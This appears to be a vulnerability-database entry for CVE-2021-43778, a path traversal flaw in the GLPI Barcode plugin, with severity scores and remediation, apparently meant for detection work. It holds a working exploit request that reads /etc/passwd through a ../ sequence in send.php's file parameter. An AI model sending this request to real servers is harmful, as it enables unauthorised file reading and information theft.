🔙 목록으로 돌아가기

CVE-2021-43778: GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.

TitleGLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.
Authorcckuailong
SeverityHigh
ImpactAn attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.
RemediationUpgrade to version 2.6.1 or later. Or, as a workaround, delete the `front/send.php` file.
CVSS Score7.5
EPSS Score0.87845
CVE IDCVE-2021-43778
CWE IDCWE-22
Tags cve cve2021 glpi lfi plugin traversal glpi-project vkev vuln

🔍 Vulnerability Description

Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.

🌐 HTTP Request

GET /glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_5_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-43778.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-43778.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A